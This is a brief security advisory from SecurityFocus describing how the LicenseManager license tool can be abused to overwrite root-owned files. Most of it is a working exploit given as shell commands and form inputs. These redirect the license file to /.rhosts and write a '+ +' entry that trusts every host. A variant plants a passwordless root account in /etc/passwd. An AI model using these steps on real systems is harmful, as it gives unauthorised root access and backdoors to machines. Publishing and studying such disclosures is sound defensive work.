source: https://www.securityfocus.com/bid/72/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field put a space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your system has remote root logins disabled, replacing /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh.